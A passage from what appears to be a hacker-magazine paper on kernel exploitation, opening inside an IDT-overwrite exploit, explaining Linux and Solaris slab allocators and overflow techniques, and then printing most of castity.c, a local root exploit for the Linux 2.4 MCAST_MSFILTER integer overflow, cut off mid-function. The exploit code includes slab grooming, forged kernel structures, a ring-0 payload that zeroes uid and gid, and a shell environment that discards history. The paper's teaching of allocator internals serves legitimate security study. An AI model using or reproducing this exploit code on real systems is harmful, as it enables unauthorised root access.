    "movl (%%eax), %%eax;"
    "add $100, %%eax;"
    "pushl %%eax;"
    "movl $give_priv_and_restore, %%ebx;"
    "call *%%ebx;"
    "popl %%eax;"
    "popa;"
    "iret;"
    "nop;nop;nop;nop;"
   :: "i"( ~(STACK_SIZE -1))
);
  return;
}

struct idt_struct
{
  uint16_t limit;
  uint32_t base;
} __attribute__((packed));


static char *allocate_frame_chunk(unsigned int base_addr,
                                  unsigned int size,
                                  void* code_addr)
{
  unsigned int round_addr = base_addr & PAGE_MASK;
  unsigned int diff       = base_addr - round_addr;
  unsigned int len        = (size + diff + (PAGE_SIZE-1)) & PAGE_MASK;

  char *map_addr = mmap((void*)round_addr,
                        len,
                        PROT_READ|PROT_WRITE,
                        MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,
                        0,
                        0);
  if(map_addr == MAP_FAILED)
    return MAP_FAILED;

  if(code_addr)
  {
    memset(map_addr, NOP, len);
    memcpy(map_addr, code_addr, size);
  }
  else
    memset(map_addr, 0x00, len);

  return (char*)base_addr;
}

inline unsigned int *get_zero_page(unsigned int size)
{
  return (unsigned int*)allocate_frame_chunk(0x00000000, size, NULL);
}

#define BOUND_ENTRY 5
unsigned int get_BOUND_address()
{
  struct idt_struct idt;
  asm volatile("sidt %0\t\n" : "=m"(idt));
  return idt.base + (8*BOUND_ENTRY);
}

unsigned int prepare_jump_code()
{
  UID = getuid();     /* set global uid */
  unsigned int base_address = ((UID & 0x0000FF00) << 16) + ((UID & 0xFF) << 16);

  printf("Using base address of: 0x%08x-0x%08x\n", base_address,
         base_address + 0x20000 - 1);

  char *addr = allocate_frame_chunk(base_address, 0x20000, NULL);
  if(addr == MAP_FAILED)
  {
    perror("unable to mmap jump code");
    exit(-1);
  }

  memset((void*)base_address, NOP, 0x20000);
  memcpy((void*)(base_address + 0x10000), do_it, CODE_SIZE);

  return base_address;
}

int main(int argc, char *argv[])
{
  struct user_data_ioctl user_ioctl;
  unsigned int *zero_page, *jump_pages, save_ptr;

  zero_page = get_zero_page(PAGE_SIZE);
  if(zero_page == MAP_FAILED)
  {
    perror("mmap: unable to map zero page");
    exit(-1);
  }

  jump_pages = (unsigned int*)prepare_jump_code();

  int ret, fd = open(DEVICE, O_RDONLY), alloc_size;

  if(argc > 1)
    alloc_size = atoi(argv[1]);
  else
    alloc_size = PAGE_SIZE-8;

  if(fd < 0)
  {
    perror("open: dummy device");
    exit(-1);
  }

  memset(&user_ioctl, 0x00, sizeof(struct user_data_ioctl));
  user_ioctl.size = alloc_size;

  ret = ioctl(fd, KERN_IOCTL_ALLOC_INFO, &user_ioctl);
  if(ret < 0)
  {
    perror("ioctl KERN_IOCTL_ALLOC_INFO");
    exit(-1);
  }

  /* save old struct ptr stored by kernel in the first word */
  save_ptr = *zero_page;

  /* compute the new ptr inside the IDT table between BOUND and INVALIDOP
     exception */
  printf("IDT bound: %x\n", get_BOUND_address());
  *zero_page = get_BOUND_address() + 6;

  user_ioctl.size=strlen(ANTANI)+1;
  user_ioctl.buffer=ANTANI;

  ret = ioctl(fd, KERN_IOCTL_STORE_INFO, &user_ioctl);

  getchar();
  do_bound_check();

  /* restore trashed ptr */
  *zero_page = save_ptr;

  ret = ioctl(fd, KERN_IOCTL_FREE_INFO, NULL);
  if(ret < 0)
  {
    perror("ioctl KERN_IOCTL_FREE_INFO");
    exit(-1);
  }

  get_root();

  return 0;
}

< / >


---[ 2.2 - The Slab Allocator 


The main purpose of a slab allocator is to speed up the
allocation/deallocation of heavily used small 'objects' and to reduce the
fragmentation that would derive from using the page-based one.
Both Solaris and Linux implement a slab memory allocator which derives
from the one described by Bonwick [8] in 1994 and implemented in Solaris
2.4.


The idea behind it is, basically: objects of the same type are grouped
together inside a cache in their constructed form. The cache is divided
into 'slabs', consisting of one or more contiguous page frames.
Every time the Operating System needs more objects, new page frames (and
thus new 'slabs') are allocated and the objects inside are constructed.
Whenever a caller needs one of these objects, it gets returned an already
prepared one, that it has only to fill with valid data. When an object is
'freed', it doesn't get destructed, but simply returned to its slab and
marked as available.


Caches are created for the most used objects/structs inside the operating
system, for example those representing inodes, virtual memory areas, etc.
General-purpose caches, suitable for small memory allocations, are
created too, one for each power of two, so that internal fragmentation is
guaranteed to be below 50%.
The Linux kmalloc() and the Solaris kmem_alloc() functions use exactly
those latter described caches. Since it is up to the caller to 'clean' the
object returned from a slab (which could contain 'dead' data), wrapper
functions that return zeroed memory are usually provided too (kzalloc(),
kmem_zalloc()).
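
The power-of-two rule can be sketched in a few lines. The smallest and
largest class sizes below are assumptions of ours (they vary between
kernels and configurations) and both function names are hypothetical; the
point is only that a request just above one class is served by the next
one, wasting a bit less than half of it.

```c
#include <assert.h>
#include <stddef.h>

#define MIN_CLASS 32        /* assumed smallest general-purpose cache */
#define MAX_CLASS 131072    /* assumed largest general-purpose cache  */

/*
 * Return the size of the power-of-two cache that would serve a request
 * of 'size' bytes, or 0 if the request is out of range.
 */
size_t size_class(size_t size)
{
    size_t cls = MIN_CLASS;

    if (size == 0 || size > MAX_CLASS)
        return 0;
    while (cls < size)
        cls <<= 1;
    return cls;
}

/* Bytes wasted inside the object returned for a request of 'size'. */
size_t wasted_bytes(size_t size)
{
    size_t cls = size_class(size);

    assert(cls != 0);       /* caller must pass an in-range size */
    return cls - size;
}
```

A 33-byte request lands in the 64-byte class and wastes 31 bytes, the
worst case for that class; requests smaller than the smallest class are
the only ones that can waste more than half of the object.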


An important (from an exploiting perspective) 'feature' of the slab
allocator is the 'bufctl', which is meaningful only inside a free object,
and is used to indicate the 'next free object'.
A list of free objects that behaves just like a LIFO is thus created, and
we'll see shortly that it is crucial for reliable exploitation.
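
A toy model may help to fix the idea. The sketch below is not the Linux
or the Solaris layout: it is a deliberately simplified slab of four
adjacent 64-byte objects where each free object stores the link to the
next free one, and every name in it is ours. It only shows the two
properties we care about, the in-order handout of a fresh slab and the
LIFO reuse of a freed object.

```c
#include <assert.h>
#include <stddef.h>

#define OBJ_SIZE  64
#define OBJ_COUNT 4

/* A free object stores the link to the next free one in its own memory. */
union toy_obj {
    union toy_obj *next_free;        /* meaningful only while free */
    unsigned char  data[OBJ_SIZE];   /* meaningful only while allocated */
};

struct toy_slab {
    union toy_obj  objs[OBJ_COUNT];  /* objects are adjacent in memory */
    union toy_obj *free_head;        /* top of the LIFO free list */
};

/* A fresh slab hands out its objects in address order. */
void toy_slab_init(struct toy_slab *s)
{
    int i;

    for (i = 0; i < OBJ_COUNT - 1; i++)
        s->objs[i].next_free = &s->objs[i + 1];
    s->objs[OBJ_COUNT - 1].next_free = NULL;
    s->free_head = &s->objs[0];
}

/* Pop the head of the free list; the contents are NOT cleaned. */
void *toy_alloc(struct toy_slab *s)
{
    union toy_obj *o = s->free_head;

    if (o != NULL)
        s->free_head = o->next_free;
    return o;
}

/* Push the object back on top: it will be the next one returned. */
void toy_free(struct toy_slab *s, void *p)
{
    union toy_obj *o = p;

    assert(o >= &s->objs[0] && o <= &s->objs[OBJ_COUNT - 1]);
    o->next_free = s->free_head;
    s->free_head = o;
}
```

Allocating two objects, freeing the first and allocating again returns
the first address once more, sitting exactly OBJ_SIZE bytes before the
second object.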


Each slab has an associated controlling struct (kmem_slab_t on Solaris,
slab_t on Linux) which is stored inside the slab (at the start, on Linux,
at the end, on Solaris) if the object size is below a given limit (1/8 of
the page), or outside it.

Since there's a 'cache' per 'object type', it's not guaranteed at all that
those 'objects' will fit exactly within a page boundary inside the slab.
That 'free' space (space not belonging to any object, nor to the slab
controlling struct) is used to 'color' the slab, respecting the object
alignment (if 'free' < 'alignment' no coloring takes place).
The first object is thus saved at a 'different offset' inside the slab,
given by 'color value' * 'alignment', (and, consequently, the same
happens to all the subsequent objects), so that objects of the same size in
different slabs will less likely end up in the same hardware cache lines.


We won't go into more details about the Slab Allocator here, since it is
well and extensively explained in many other places, most notably at [9],
[10], and [11], and we move towards effective exploitation.
Some more implementation details will be given, though, along with the
exploiting techniques explanation.


---[ 2.2.1 - Slab overflow vulnerabilities 


NOTE: as we said before, Solaris and Linux have two different functions to
alloc from the general purpose caches, kmem_alloc() and kmalloc(). Those
two functions behave basically in the same manner, so, from now on we'll
just use 'kmalloc' and 'kmalloc'ed memory' in the discussion, referring
though to both the operating systems' implementations.


A slab overflow is simply the writing past the buffer boundaries of a
kmalloc'ed object. The result of this overflow can be:

  - overwriting an adjacent in-slab object.

  - overwriting a page next to the slab one, in the case we're overwriting
    past the last object.

  - overwriting the control structure associated with the slab (Solaris
    only)


The first case is the one we're going to show an exploit for. The main
idea in such a situation is to fill the slabs (we can track the slab
status thanks to /proc/slabinfo on Linux and kstat -n 'cache_name' on
Solaris) so that a new one is necessary.
We do that to be sure that we'll have a 'controlled' bufctl: since all the
slabs were full, we got a new page, along with a 'fresh' bufctl
pointer starting from the first object.


At that point we alloc two objects, free the first one and trigger the
vulnerable code: it will request a new object and overwrite right into
the previously allocated second one. If a pointer inside this second
object is stored and then used (after the overflow) it is under our
control.
This approach is very reliable.
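
The first case can be modelled in userspace with two adjacent 64-byte
objects. Everything in this sketch is hypothetical (the victim layout,
the handler names, the buggy copy routine): it only illustrates how an
unchecked length on the first object rewrites a pointer stored at the
start of the second one.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define OBJ_SIZE 64

typedef void (*handler_t)(void);

/* Hypothetical 64-byte object that starts with a function pointer. */
struct victim {
    handler_t     handler;
    unsigned char pad[OBJ_SIZE - sizeof(handler_t)];
};

/* Two adjacent objects, as they would sit inside a fresh slab. */
struct toy_slab {
    unsigned char first[OBJ_SIZE];  /* handed to the vulnerable path */
    struct victim second;           /* allocated right after it */
};

void legit_handler(void) { }
void evil_handler(void)  { }

/*
 * Vulnerable copy: 'len' comes from the caller and is never compared
 * against OBJ_SIZE, so anything past 64 bytes spills into 'second'.
 */
void buggy_fill(struct toy_slab *s, const void *src, size_t len)
{
    assert(len <= sizeof(*s));      /* keep the toy itself in bounds */
    memcpy((unsigned char *)s, src, len);
}
```

Feeding it 64 filler bytes followed by the bytes of a pointer to
evil_handler leaves second.handler pointing to evil_handler, which is the
userspace equivalent of the pointer 'under our control' mentioned above.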


The second case is more complex, since we don't have an object with a
pointer or any modifiable data value of interest to overwrite into. We
still have one chance, though, using the page frame allocator.
We start eating a lot of memory requesting the kind of 'page' we want to
overflow into (for example, tons of file descriptors), putting the memory
under pressure. At that point we start freeing a couple of them, so that
the total amount counts for a page.
At that point we start filling the slab so that a new page is requested.
If we've been lucky the new page is going to be just before one of the
previously allocated ones and we've now the chance to overwrite it.


The main point affecting the reliability of such an exploit is:

  - it's not trivial to 'isolate' a given struct/data to mass alloc at the
    first step, without having also other kernel structs/data growing
    together with it.
    An example will clarify: to allocate tons of file descriptors we need
    to create a large number of threads. That translates into the
    allocation of all the related control structs which could end up
    placed right after our overflowing buffer.


The third case is possible only on Solaris, and only on slabs which keep
objects smaller than 'page_size >> 3'. Since Solaris keeps the kmem_slab
struct at the end of the slab we can use the overflow of the last object
to overwrite data inside it.


In the latter two types of exploit presented we have to take into
account slab coloring. Both the operating systems store the 'next color
offset' inside the cache descriptor, and update it at every slab
allocation (let's see an example from OpenSolaris sources):


< usr/src/uts/common/os/kmem.c >

static kmem_slab_t *
kmem_slab_create(kmem_cache_t *cp, int kmflag)
{
[...]
        size_t color, chunks;
[...]
        color = cp->cache_color + cp->cache_align;
        if (color > cp->cache_maxcolor)
                color = cp->cache_mincolor;
        cp->cache_color = color;

< / >


'mincolor' and 'maxcolor' are calculated at cache creation and represent
the boundaries of available caching:


# uname -a
SunOS principessa 5.9 Generic_118558-34 sun4u sparc SUNW,Ultra-5_10
# kstat -n file_cache | grep slab
        slab_alloc                      280
        slab_create                     2
        slab_destroy                    0
        slab_free                       0
        slab_size                       8192
# kstat -n file_cache | grep align
        align                           8
# kstat -n file_cache | grep buf_size
        buf_size                        56
# mdb -k
Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
> ::sizeof kmem_slab_t
sizeof (kmem_slab_t) = 0x38
> ::kmem_cache ! grep file_cache
00000300005fed88 file_cache                0000 000000       56      290
> 00000300005fed88::print kmem_cache_t cache_mincolor
cache_mincolor = 0
> 00000300005fed88::print kmem_cache_t cache_maxcolor
cache_maxcolor = 0x10
> 00000300005fed88::print kmem_cache_t cache_color
cache_color = 0x10
> ::quit


As you can see, from kstat we know that 2 slabs have been created and we
know the alignment, which is 8. Object size is 56 bytes and the size of
the in-slab control struct is 56, too. Each slab is 8192 bytes, which,
modulo 56, gives out exactly 16, which is the maxcolor value (the color
range is thus 0 - 16, which leads to three possible colorings with an
alignment of 8).


Based on the previous snippet of code, we know that the first allocation
had a coloring of 8 (mincolor == 0 + align == 8), the second one of 16
(which is the value still recorded inside the kmem_cache_t).
If we were to exhaust this slab and get a new one we would know for
sure that the coloring would be 0.
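
The same prediction can be replayed with a few lines of C. The struct
below keeps only the four fields used by the coloring step (same names as
in the kmem.c excerpt), while the function names are ours; the starting
color of 0 is an assumption consistent with the first slab getting a
coloring of 8.

```c
#include <assert.h>
#include <stddef.h>

/* Only the fields used by the coloring step; names follow the excerpt. */
struct toy_cache {
    size_t cache_color;     /* color used by the most recent slab */
    size_t cache_align;
    size_t cache_mincolor;
    size_t cache_maxcolor;
};

/* Same update rule as the kmem_slab_create() excerpt. */
size_t next_slab_color(struct toy_cache *cp)
{
    size_t color;

    assert(cp->cache_align != 0);
    color = cp->cache_color + cp->cache_align;
    if (color > cp->cache_maxcolor)
        color = cp->cache_mincolor;
    cp->cache_color = color;
    return color;
}

/* Space left over once 'slab_size' is filled with 'obj_size' objects. */
size_t leftover(size_t slab_size, size_t obj_size)
{
    return slab_size % obj_size;
}
```

With align 8, mincolor 0 and maxcolor 16 the successive slabs get the
colors 8, 16, 0, 8 and so on, and 8192 modulo 56 is indeed 16.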


Linux uses a similar 'circular' coloring too, just look for the
'kmem_cache_t'->colour_next setting and incrementation.


Neither operating system decrements the color value upon freeing of
a slab, so that has to be taken into account too (easy to do on Solaris,
since slab_create is the maximum number of slabs created).


---[ 2.2.2 - Slab overflow exploiting : MCAST_MSFILTER


Given the technical basis to understand and exploit a slab overflow, it’s 
time for a practical example. 

We're presenting here an exploit for the MCAST_MSFILTER [4] vulnerability
found by iSEC people:


< linux-2.4.24/net/ipv4/ip_sockglue.c >

case MCAST_MSFILTER:
{
        struct sockaddr_in *psin;
        struct ip_msfilter *msf = 0;
        struct group_filter *gsf = 0;
        int msize, i, ifindex;

        if (optlen < GROUP_FILTER_SIZE(0))
                goto e_inval;

        gsf = (struct group_filter *)kmalloc(optlen,GFP_KERNEL);    [2]
        if (gsf == 0) {
                err = -ENOBUFS;
                break;
        }
        err = -EFAULT;

        if (copy_from_user(gsf, optval, optlen)) {                  [3]
                goto mc_msf_out;
        }
        if (GROUP_FILTER_SIZE(gsf->gf_numsrc) < optlen) {           [4]
                err = EINVAL;
                goto mc_msf_out;
        }

        msize = IP_MSFILTER_SIZE(gsf->gf_numsrc);                   [1]
        msf = (struct ip_msfilter *)kmalloc(msize,GFP_KERNEL);      [7]
        if (msf == 0) {
                err = -ENOBUFS;
                goto mc_msf_out;
        }

        [...]

        msf->imsf_multiaddr = psin->sin_addr.s_addr;
        msf->imsf_interface = 0;
        msf->imsf_fmode = gsf->gf_fmode;
        msf->imsf_numsrc = gsf->gf_numsrc;
        err = -EADDRNOTAVAIL;
        for (i=0; i<gsf->gf_numsrc; ++i) {                          [5]
                psin = (struct sockaddr_in *)&gsf->gf_slist[i];
                if (psin->sin_family != AF_INET)                    [8]
                        goto mc_msf_out;
                msf->imsf_slist[i] = psin->sin_addr.s_addr;         [6]

        [...]

        mc_msf_out:
                if (msf)
                        kfree(msf);
                if (gsf)
                        kfree(gsf);
                break;

< / >

< linux-2.4.24/include/linux/in.h >

#define IP_MSFILTER_SIZE(numsrc) \                                  [1]
        (sizeof(struct ip_msfilter) - sizeof(__u32) \
        + (numsrc) * sizeof(__u32))

[...]

#define GROUP_FILTER_SIZE(numsrc) \                                 [4]
        (sizeof(struct group_filter) - sizeof(struct __kernel_sockaddr_storage) \
        + (numsrc) * sizeof(struct __kernel_sockaddr_storage))

< / >


The vulnerability consists of an integer overflow at [1], since we control
the gsf struct as you can see from [2] and [3].
The check at [4] proved to be, initially, a problem, which was resolved
thanks to the slab property of not cleaning objects on free (back to that
shortly).
The for loop at [5] is where we effectively do the overflow, by writing,
at [6], the 'psin->sin_addr.s_addr' passed inside the gsf struct over the
previously allocated msf [7] struct (kmalloc'ed with the badly calculated
'msize' value).
This for loop is a godsend, because thanks to the check at [8] we are able
to avoid the classical problem with integer overflow derived bugs (that is
writing _a lot_ after the buffer due to the usually huge value used to
trigger the overflow) and exit cleanly through mc_msf_out.


As explained before, while describing the 'first exploitation approach', we
need to find some object/data that gets kmalloc'ed in the same slab and
which has inside a pointer or some crucial value that would let us change
the execution flow.


We found a solution with the 'struct shmid_kernel':

< linux-2.4.24/ipc/shm.c >

struct shmid_kernel /* private to the kernel */
{
        struct kern_ipc_perm    shm_perm;
        struct file *           shm_file;
        int                     id;
[...]
};

[...]

asmlinkage long sys_shmget (key_t key, size_t size, int shmflg)
{
        struct shmid_kernel *shp;
        int err, id = 0;

        down(&shm_ids.sem);
        if (key == IPC_PRIVATE) {
                err = newseg(key, shmflg, size);
[...]

static int newseg (key_t key, int shmflg, size_t size)
{
[...]
        shp = (struct shmid_kernel *) kmalloc (sizeof (*shp), GFP_USER);
[...]
}

< / >

As you see, struct shmid_kernel is 64 bytes long and gets allocated using
the kmalloc (size-64) generic cache [ we can alloc as many as we want (up
to filling the slab) using subsequent 'shmget' calls ].
Inside it there is a struct file pointer, that we could make point, thanks
to the overflow, to the userland, where we will emulate all the necessary
structs to reach a function pointer dereference (that's exactly what the
exploit does).


Now it is time to force the msize value into being > 32 and <= 64, to make
it get alloc'ed inside the same (size-64) generic cache.
'Good' values for gsf->gf_numsrc range from 0x40000005 to 0x4000000c.
That raises another problem: since we're able to write 4 bytes for
every __kernel_sockaddr_storage present in the gsf struct we need a pretty
large one to reach the 'shm_file' pointer, and so we need to pass a large
'optlen' value.
The 0x40000005 - 0x4000000c range, though, makes the GROUP_FILTER_SIZE()
macro used at [4] evaluate to a positive and small value, which isn't large
enough to reach the 'shm_file' pointer.
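
Both claims can be verified by evaluating the two macros with 32-bit
wrap-around. The struct sizes below are our assumption for the i386 2.4
layout (ip_msfilter as five 32-bit words, a 128-byte
__kernel_sockaddr_storage and a group_filter of 4 + 128 + 4 + 4 + 128
bytes), and the function names are ours as well; treat it as a sketch to
check the arithmetic, not as kernel code.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed i386 struct sizes for the 2.4 kernel (not taken from the paper). */
#define SIZEOF_IP_MSFILTER   20u
#define SIZEOF_SOCK_STORAGE 128u
#define SIZEOF_GROUP_FILTER 268u

/* IP_MSFILTER_SIZE() evaluated with 32-bit wrap-around. */
uint32_t ip_msfilter_size32(uint32_t numsrc)
{
    return SIZEOF_IP_MSFILTER - 4u + numsrc * 4u;
}

/* GROUP_FILTER_SIZE() evaluated with 32-bit wrap-around. */
uint32_t group_filter_size32(uint32_t numsrc)
{
    return SIZEOF_GROUP_FILTER - SIZEOF_SOCK_STORAGE +
           numsrc * SIZEOF_SOCK_STORAGE;
}

/* True if a kmalloc() of 'msize' bytes would land in the size-64 cache. */
int lands_in_size_64(uint32_t msize)
{
    return msize > 32u && msize <= 64u;
}

/* Walk the range quoted in the text and check that every value fits. */
void check_good_range(void)
{
    uint32_t n;

    for (n = 0x40000005u; n <= 0x4000000cu; n++)
        assert(lands_in_size_64(ip_msfilter_size32(n)));
}
```

Under those assumptions msize goes from 36 to 64 across the range, while
GROUP_FILTER_SIZE() goes from 780 to 1676: small and positive, as stated.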


We solved that problem thanks to the fact that, once an object is free’d, 
its ‘memory contents’ are not zero’ed (or cleaned in any way). 

Since the copy_from_user at [3] happens _before_ the check at [4], we were 
able to create a sequence of 1024-sized objects by repeatedly issuing a 
failing (at [4]) ’setsockopt’, thus obtaining a large-enough one. 


Hoping to make it clearer, let's sum up the steps:

  - fill the 1024 slabs so that at the next allocation a fresh one is
    returned

  - alloc the first object of the new 1024-slab.

  - use as many 'failing' setsockopt as needed to copy values inside
    objects 2 and 3 [and 4, if needed, not the usual case though]

  - free the first object

  - use a smaller (but still 1024-slab allocation driving) value for
    optlen that would pass the check at [4]


At that point the gsf pointer points to the first object inside our
freshly created slab. Objects 2 and 3 haven't been re-used yet, so they
still contain our data. Since the objects inside the slab are adjacent we
have a de-facto larger (and large enough) gsf struct to reach the
'shm_file' pointer.


Last note, to reliably fill the slabs we check /proc/slabinfo. 

The exploit, called castity.c, was written when the advisory went out, and 
is only for 2.4.* kernels (the sys_epoll vulnerability [12] was more than 
enough for 2.6.* ones ;) ) 


Exploit follows, just without the initial header, since the approach has 
been already extensively explained above. 


< stuff/expl/linux/castity.c >

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>

#define __u32           unsigned int
#define MCAST_MSFILTER  48
#define SOL_IP          0
#define SIZE            4096
#define R_FILE          "/etc/passwd"   // Set it to whatever file you
                                        // can read. It's just for 1024 filling.

struct in_addr {
        unsigned int s_addr;
};

#define __SOCK_SIZE__   16

struct sockaddr_in {
        unsigned short          sin_family;     /* Address family   */
        unsigned short int      sin_port;       /* Port number      */
        struct in_addr          sin_addr;       /* Internet address */

        /* Pad to size of 'struct sockaddr'. */
        unsigned char           __pad[__SOCK_SIZE__ - sizeof(short int) -
                                sizeof(unsigned short int) -
                                sizeof(struct in_addr)];
};

struct group_filter
{
        __u32                   gf_interface;   /* interface index */
        struct sockaddr_storage gf_group;       /* multicast address */
        __u32                   gf_fmode;       /* filter mode */
        __u32                   gf_numsrc;      /* number of sources */
        struct sockaddr_storage gf_slist[1];    /* interface index */
};

struct damn_inode {
        void            *a, *b;
        void            *c, *d;
        void            *e, *f;
        void            *i, *l;
        unsigned long   size[40];  // Yes, somewhere here :-)
} le;

struct dentry_suck {
        unsigned int    count, flags;
        void            *inode;
        void            *dd;
} fucking = { 0xbad, 0xbad, &le, NULL };

struct fops_rox {
        void            *a, *b, *c, *d, *e, *f, *g;
        void            *mmap;
        void            *h, *i, *l, *m, *n, *o, *p, *q, *r;
        void            *get_unmapped_area;
} chien;

struct file_fuck {
        void            *prev, *next;
        void            *dentry;
        void            *mnt;
        void            *fop;
} gagne = { NULL, NULL, &fucking, NULL, &chien };

static char     stack[16384];

int             gotsig = 0,
                fillup_1024 = 0,
                fillup_64 = 0,
                uid, gid;

int             *pid, *shmid;

static void sigusr(int b)
{
        gotsig = 1;
}

void fatal (char *str)
{
        fprintf(stderr, "[-] %s\n", str);
        exit(EXIT_FAILURE);
}

#define BUFSIZE 256

int calculate_slaboff(char *name)
{
        FILE *fp;
        char slab[BUFSIZE], line[BUFSIZE];
        int ret;
        /* UP case */
        int active_obj, total;

        bzero(slab, BUFSIZE);
        bzero(line, BUFSIZE);

        fp = fopen("/proc/slabinfo", "r");
        if ( fp == NULL )
                fatal("error opening /proc for slabinfo");

        fgets(slab, sizeof(slab) - 1, fp);
        do {
                ret = 0;
                if (!fgets(line, sizeof(line) - 1, fp))
                        break;
                ret = sscanf(line, "%s %u %u", slab, &active_obj, &total);
        } while (strcmp(slab, name));

        close(fileno(fp));
        fclose(fp);

        return ret == 3 ? total - active_obj : -1;
}

int populate_1024_slab()
{
        int fd[252];
        int i;

        signal(SIGUSR1, sigusr);

        for ( i = 0; i < 252 ; i++)
                fd[i] = open(R_FILE, O_RDONLY);

        while (!gotsig)
                pause();
        gotsig = 0;

        for ( i = 0; i < 252; i++)
                close(fd[i]);
}

int kernel_code()
{
        int i, c;
        int *v;

        __asm__("movl %%esp, %0" : "=m" (c));

        c &= 0xffffe000;
        v = (void *) c;

        for (i = 0; i < 4096 / sizeof(*v) - 1; i++) {
                if (v[i] == uid && v[i+1] == uid) {
                        i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
                }
                if (v[i] == gid) {
                        v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
                        return -1;
                }
        }

        return -1;
}

void prepare_evil_file ()
{
        int i = 0;

        chien.mmap = &kernel_code ;  // just to pass do_mmap_pgoff check
        chien.get_unmapped_area = &kernel_code;

        /*
         * First time i run the exploit i was using a precise offset for
         * size, and i calculated it _wrong_. Since then my lazyness took
         * over and i use that ""very clean"" *g* approach.
         * Why i'm telling you ? It's 3 a.m., i don't find any better than
         * writing blubbish comments
         */

        for ( i = 0; i < 40; i++)
                le.size[i] = SIZE;
}

#define SEQ_MULTIPLIER 32768

void prepare_evil_gf ( struct group_filter *gf, int id )
{
        int filling_space = 64 - 4 * sizeof(int);
        int i = 0;
        struct sockaddr_in *sin;

        filling_space /= 4;

        for ( i = 0; i < filling_space; i++ )
        {
                sin = (struct sockaddr_in *)&gf->gf_slist[i];
                sin->sin_family = AF_INET;
                sin->sin_addr.s_addr = 0x41414141;
        }

        /* Emulation of struct kern_ipc_perm */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = IPC_PRIVATE;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = uid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = gid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = uid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = gid;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = -1;

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = id/SEQ_MULTIPLIER;

        /* evil struct file address */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = AF_INET;
        sin->sin_addr.s_addr = (unsigned long)&gagne;

        /* that will stop mcast loop */

        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
        sin->sin_family = 0xbad;
        sin->sin_addr.s_addr = 0xdeadbeef;

        return;
}

void cleanup ()
{
        int i = 0;
        struct shmid_ds s;

        for ( i = 0; i < fillup_1024; i++ )
        {
                kill(pid[i], SIGUSR1);
                waitpid(pid[i], NULL, __WCLONE);
        }

        for ( i = 0; i < fillup_64 - 2; i++ )
                shmctl(shmid[i], IPC_RMID, &s);
}

#define EVIL_GAP        4
#define SLAB_1024       "size-1024"
#define SLAB_64         "size-64"
#define OVF             21
#define CHUNKS          1024
#define LOOP_VAL        0x4000000f
#define CHIEN_VAL       0x4000000b

int main()
{
        int sockfd, ret, i;
        unsigned int true_alloc_size, last_alloc_chunk, loops;
        char *buffer;
        struct group_filter *gf;
        struct shmid_ds s;
        char *argv[] = { "le-chien", NULL };
        char *envp[] = { "TERM=linux", "PS1=le-chien\\$",
                "BASH_HISTORY=/dev/null", "HISTORY=/dev/null",
                "history=/dev/null",
                "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
                "HISTFILE=/dev/null", NULL };

        true_alloc_size = sizeof(struct group_filter) -
                          sizeof(struct sockaddr_storage) +
                          sizeof(struct sockaddr_storage) * OVF;


sockfd = socket (AF_INET, SOCK_STREAM, 0); 


uid = getuid(); 
gid = getgid(); 


        gf = malloc(true_alloc_size);
        if ( gf == NULL )
                fatal("Malloc failure\n");


gf->gf_interface = 0; 
gf->gf_group.ss_family = AF_INET; 


fillup_64 = calculate_slaboff(SLAB_64); 


if ( fillup_64 == -1 ) 
fatal("Error calculating slab fillup\n"); 


        printf("[+] Slab %s fillup is %d\n", SLAB_64, fillup_64);

        /* Yes, two would be enough, but we have that "sexy" #define, why
           don't use it ? :-) */
        fillup_64 += EVIL_GAP;

        shmid = malloc(fillup_64 * sizeof(int));
        if ( shmid == NULL )
                fatal("Malloc failure\n");

        /* Filling up the size-64 and obtaining a new page with EVIL_GAP
           entries */
        for ( i = 0; i < fillup_64; i++ )
                shmid[i] = shmget(IPC_PRIVATE, 4096, IPC_CREAT|SHM_R);


prepare_evil_file(); 
prepare_evil_gf(gf, shmid[fillup_64 - 1]); 


buffer = (char *)gf; 


fillup_1024 = calculate_slaboff(SLAB_1024); 
if ( fillup_1024 == -1 ) 
fatal("Error calculating slab fillup\n"); 


        printf("[+] Slab %s fillup is %d\n", SLAB_1024, fillup_1024);


fillup_1024 += EVIL_GAP; 


pid = malloc(fillup_1024 * sizeof(int)); 
if (pid == NULL ) 
fatal ("Malloc failure\n"); 


        for ( i = 0; i < fillup_1024; i++ )
                pid[i] = clone(populate_1024_slab, stack + sizeof(stack) - 4,
                               0, NULL);


        printf("[+] Attempting to trash size-1024 slab\n");

        /* Here starts the loop trashing size-1024 slab */
        last_alloc_chunk = true_alloc_size % CHUNKS;
        loops = true_alloc_size / CHUNKS;

        gf->gf_numsrc = LOOP_VAL;

        printf("[+] Last size-1024 chunk is of size %d\n",
               last_alloc_chunk);
        printf("[+] Looping for %d chunks\n", loops);

        kill(pid[--fillup_1024], SIGUSR1);
        waitpid(pid[fillup_1024], NULL, __WCLONE);



        if ( last_alloc_chunk > 512 )
                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer +
                                 loops * CHUNKS, last_alloc_chunk);
        else
                /*
                 * Should never happen. If it happens it probably means that
